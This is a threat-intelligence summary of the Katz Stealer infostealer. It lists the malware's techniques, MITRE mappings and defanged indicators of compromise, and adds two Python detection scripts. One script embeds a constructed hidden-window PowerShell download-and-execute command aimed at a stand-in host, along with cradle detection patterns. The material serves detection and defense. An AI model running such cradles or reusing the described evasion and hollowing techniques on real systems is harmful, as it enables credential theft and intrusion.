Katz Stealer is a credential-stealing malware as a service that targets browsers, communication apps, crypto wallets, and gaming platforms to exfiltrate sensitive data using sophisticated evasion and injection techniques. Its infection chain involves obfuscated JavaScript and PowerShell scripts, .NET loader payloads, process hollowing, UAC bypass, and geofencing, with detailed YARA and Sigma detection rules available. #KatzStealer #ProcessHollowing #DiscordHijacking #AppBoundEncryption
Keypoints
- Katz Stealer targets popular browsers (Chrome, Edge, Brave, Firefox) to steal passwords, cookies, and session tokens by decrypting app-bound encrypted data.
- The malware hijacks communication apps like Discord via modification of app.asar files to execute remote JavaScript code and maintain persistent backdoors.
- Katz Stealer exfiltrates cryptocurrency wallet files and extensions, supporting over a dozen wallet types and recursively copying wallet directories.
- It employs advanced evasion tactics including geofencing (excluding CIS countries), virtual machine and sandbox detection through BIOS checks, screen resolution, and uptime.
- The infection chain uses obfuscated JavaScript and base64-encoded PowerShell scripts to download .NET loaders that inject payloads into legitimate processes such as MSBuild via process hollowing.
- The malware abuses legitimate Windows utilities like cmstp.exe for UAC bypass, enabling elevated execution without triggering prompts.
- Detection opportunities include monitoring unusual outbound network traffic to Katz Stealer C2 servers, unexpected process creation/injections, headless browser execution, and suspicious temporary files.
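The second stage described above is a base64-encoded PowerShell script launched with hidden-window flags. The following is an added triage helper (not code from the Nextron report or from the Katz Stealer samples) that decodes an `-EncodedCommand` body from a process command line, flags the launch switches that hide the console or disable safeguards, and looks for download-and-execute cradles in the decoded script. The sample command line, its inner script and the URL in it are constructed for the example; the scoring thresholds are an assumption.

```python
import base64
import re

# Constructed stand-in for a hidden-window second stage: a download cradle.
# The URL and script body are invented for this example and are not taken
# from the Katz Stealer samples.
INNER_SCRIPT = (
    "$u='http://example.invalid/stage3.ps1';"
    "IEX (New-Object Net.WebClient).DownloadString($u)"
)

# Launch switches that hide the console or disable safeguards. The patterns
# accept the short aliases PowerShell allows (-w, -nop, -ep, -noni) as well
# as the long forms.
FLAG_PATTERNS = {
    "hidden_window": r"-w(?:indowstyle)?\s+hidden\b",
    "no_profile": r"-nop(?:rofile)?\b",
    "bypass_policy": r"-(?:ep|executionpolicy)\s+bypass\b",
    "non_interactive": r"-noni(?:nteractive)?\b",
}

# Cmdlets and .NET calls typical of in-memory download-and-execute stagers.
CRADLE_PATTERNS = {
    "download": r"downloadstring|downloadfile",
    "invoke_expression": r"\biex\b|invoke-expression",
    "web_client": r"net\.webclient",
    "base64_decode": r"frombase64string",
    "web_request": r"invoke-webrequest|\biwr\b",
}

URL_PATTERN = r"https?://[^\s'\"()]+"


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand body, or None if the line has none."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    raw = base64.b64decode(m.group(1))
    return raw.decode("utf-16-le", errors="replace")


def triage(cmdline: str) -> dict:
    """Score one process command line and expose what an analyst needs to see."""
    decoded = decode_encoded_command(cmdline)
    body = decoded if decoded is not None else cmdline
    flags = [n for n, p in FLAG_PATTERNS.items() if re.search(p, cmdline, re.I)]
    cradles = [n for n, p in CRADLE_PATTERNS.items() if re.search(p, body, re.I)]
    urls = re.findall(URL_PATTERN, body, re.I)
    # Assumed weighting: a cradle in the body counts double a launch switch.
    score = len(flags) + 2 * len(cradles)
    if cradles and flags:
        verdict = "likely_malicious"
    elif cradles or score >= 2:
        verdict = "review"
    else:
        verdict = "benign"
    return {"decoded": decoded, "launch_flags": flags, "cradles": cradles,
            "urls": urls, "score": score, "verdict": verdict}


# Constructed command line mimicking the hidden-window launch pattern.
SAMPLE_CMDLINE = (
    "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
    "-EncodedCommand " + encode_powershell(INNER_SCRIPT)
)

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, "powershell.exe -NoProfile -Command Get-Process"):
        r = triage(line)
        print(r["verdict"], r["launch_flags"], r["cradles"], r["urls"])
```

Feed it the CommandLine field of Sysmon Event ID 1 or Windows 4688 events; the decoded body is what you pivot on for the download URL, and the URL list is what you correlate with the proxy logs. A plain `-Command` line with no cradle stays benign, so a handful of hidden-window administrative scripts will not drown the queue.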
MITRE Techniques
- [T1055] Process Injection – Katz Stealer injects its payload into legitimate processes such as MSBuild via process hollowing to evade detection (‘payload is injected into a legitimate process via Process Hollowing, in this case the MSBuild process’).
- [T1012] Query Registry – The malware reads the BIOS description from the registry key HKLM\HARDWARE\DESCRIPTION\System\BIOS to detect virtual environments; the key is only read, not modified (‘queries the system BIOS information through registry key HKLM\HARDWARE\DESCRIPTION\System\BIOS’).
- [T1059.001] Command and Scripting Interpreter: PowerShell – Obfuscated and base64-encoded PowerShell scripts are used to download payloads and execute code directly in memory (‘second stage is an obfuscated and base64-encoded PowerShell script… executed through PowerShell using hidden window flags’).
- [T1204.002] User Execution: Malicious File – Infection initiates via malicious gzip files containing obfuscated JavaScript that trigger PowerShell execution (‘JavaScript in gzip files which, when opened, trigger the download of a PowerShell script’).
- [T1548.002] Abuse Elevation Control Mechanism: Bypass User Access Control – Katz Stealer abuses the legitimate utility cmstp.exe to bypass UAC without user prompts (‘UAC bypass abusing cmstp.exe, a legitimate Windows utility’).
- [T1218.003] System Binary Proxy Execution: CMSTP – The malware runs its elevation stage through cmstp.exe, a signed Microsoft binary, so the malicious activity is proxied by a legitimate Windows utility rather than by the loader itself (‘abusing legitimate Windows utilities (e.g., cmstp.exe)’).
- [T1497.001] Virtualization/Sandbox Evasion: System Checks – Uses screen resolution and system uptime as anti-sandbox techniques (‘Sandbox evasion via screen resolution and system uptime analysis’).
- [T1016] System Network Configuration Discovery – Extracts WiFi credentials using netsh and VPN configurations for further access (‘exploiting network and system data, including WiFi credentials via netsh and VPN setups’).
- [T1113] Screen Capture – Captures screenshots on command from C2 server using BitBlt function and uploads images (‘malware uses BitBlt function to take a screenshot of the entire screen’).
- [T1115] Clipboard Data – The malware can read the system clipboard on demand and send its contents to the C2 server (‘ability to monitor the system clipboard and send contents to C2 server’).
Indicators of Compromise
- [C2 Addresses] Command and control servers – 185.107.74[.]40, 31.177.109[.]39, twist2katz[.]com, pub-ce02802067934e0eb072f69bf6427bf6[.]r2[.]dev
- [Related Domains] Katz Stealer infrastructure – katz-stealer[.]com, katzstealer[.]com
- [User-Agent] Unique outbound HTTP header – Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 katz-ontop
- [Filenames] Temporary malware artifacts – AppData\Local\Temp\katzontop.dll, AppData\Local\Temp\receiveddll.dll, AppData\Roaming\decryptedchromekey.txt, AppData\Roaming\decryptedbravekey.txt, AppData\Roaming\decryptededgekey.txt
- [File Hashes] Malware components – Gzip archive (22af84327cb8ecafa44b51e9499238ca2798cec38c2076b702c60c72505329cb), PowerShell script (fb2b9163e8edf104b603030cff2dc62fe23d8f158dd90ea483642fce2ceda027), .NET UAC bypass binary (4f12c5dca2099492d0c0cd22edef841cbe8360af9be2d8e9b57c2f83d401c1a7), and multiple stealer payloads
- [Payloads] DLL and executable modules – katzontop.dll, receiveddll.dll and various stealer payload binaries with unique SHA256 hashes
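The indicators above are published defanged and mix network, user-agent and host artefacts. The following is an added example (not code from the Nextron report) that refangs them, anchors host and IP matches so that a substring of a longer hostname or address does not fire, matches the temp-file paths regardless of slash direction and case, and adds one behavioural check from the report: the hollowed MSBuild process writing a file into %TEMP%. The proxy and Sysmon log lines are constructed for the example, and the flattened key=value layout is an assumption about your log source.

```python
import re
from collections import Counter

# Indicators from the report above, kept defanged exactly as published.
IOCS = {
    "c2_ip": ["185.107.74[.]40", "31.177.109[.]39"],
    "domain": [
        "twist2katz[.]com",
        "pub-ce02802067934e0eb072f69bf6427bf6[.]r2[.]dev",
        "katz-stealer[.]com",
        "katzstealer[.]com",
    ],
    # The trailing token is what makes the otherwise ordinary Chrome UA unique.
    "user_agent": ["katz-ontop"],
    "file_path": [
        r"AppData\Local\Temp\katzontop.dll",
        r"AppData\Local\Temp\receiveddll.dll",
        r"AppData\Roaming\decryptedchromekey.txt",
        r"AppData\Roaming\decryptedbravekey.txt",
        r"AppData\Roaming\decryptededgekey.txt",
    ],
}


def refang(ioc: str) -> str:
    """Turn a defanged indicator (185.107.74[.]40) back into a matchable one."""
    return ioc.replace("[.]", ".")


def normalize_path(s: str) -> str:
    """Compare Windows paths with either slash direction, case-insensitively."""
    return s.replace("\\", "/").lower()


def compile_iocs():
    """Build (kind, indicator, matcher) triples; each matcher takes a raw line."""
    compiled = []
    for kind, values in IOCS.items():
        for value in values:
            plain = refang(value)
            if kind in ("c2_ip", "domain", "user_agent"):
                # Anchor on non-hostname characters so 1.2.3.4 does not hit
                # 11.2.3.45 and katzstealer.com does not hit notkatzstealer.com.
                pat = re.compile(r"(?<![\w.-])" + re.escape(plain) + r"(?![\w.-])", re.I)
                compiled.append((kind, value, lambda line, p=pat: bool(p.search(line))))
            else:
                needle = normalize_path(plain)
                compiled.append((kind, value, lambda line, n=needle: n in normalize_path(line)))
    return compiled


def scan_logs(lines):
    """Return one hit per (line, indicator); line numbers are 1-indexed."""
    matchers = compile_iocs()
    hits = []
    for no, line in enumerate(lines, start=1):
        for kind, value, match in matchers:
            if match(line):
                hits.append({"line": no, "type": kind, "indicator": value})
        norm = normalize_path(line)
        # Behavioural check: MSBuild (the hollowing target named in the report)
        # creating a file under %TEMP%, as seen in Sysmon Event ID 11 (FileCreate).
        if "eventid=11" in norm and "msbuild.exe" in norm and "/appdata/local/temp/" in norm:
            hits.append({"line": no, "type": "heuristic", "indicator": "msbuild_writes_temp_file"})
    return hits


def hits_by_line(hits) -> dict:
    """Map line number to the sorted list of hit types on that line."""
    out = {}
    for h in hits:
        out.setdefault(h["line"], []).append(h["type"])
    return {k: sorted(v) for k, v in out.items()}


def summarize(hits) -> Counter:
    return Counter(h["type"] for h in hits)


# Constructed proxy and Sysmon lines, flattened to key=value for the example.
SAMPLE_LOGS = [
    r'2025-05-22T10:14:03Z proxy src=10.0.0.5 dst=185.107.74.40:443 host=twist2katz.com '
    r'ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
    r'Chrome/135.0.0.0 Safari/537.36 katz-ontop"',
    r'2025-05-22T10:14:05Z sysmon EventID=11 Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe '
    r'TargetFilename=C:\Users\alice\AppData\Local\Temp\katzontop.dll',
    r'2025-05-22T10:15:40Z proxy src=10.0.0.7 dst=203.0.113.10:443 host=example.com '
    r'ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
    r'Chrome/135.0.0.0 Safari/537.36"',
    r'2025-05-22T10:16:12Z proxy src=10.0.0.5 dst=31.177.109.39:80 '
    r'host=pub-ce02802067934e0eb072f69bf6427bf6.r2.dev ua="curl/8.5.0"',
]

if __name__ == "__main__":
    found = scan_logs(SAMPLE_LOGS)
    for h in found:
        print(h)
    print(summarize(found))
```

Treat the IP and domain hits as time-bound: C2 infrastructure in a malware-as-a-service operation rotates, so a miss on those is weak evidence. The `katz-ontop` user-agent token and the fixed temp-file names are the durable indicators here, and the MSBuild-writes-to-%TEMP% heuristic is the one that survives an infrastructure change entirely.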
Read more: https://www.nextron-systems.com/2025/05/23/katz-stealer-threat-analysis/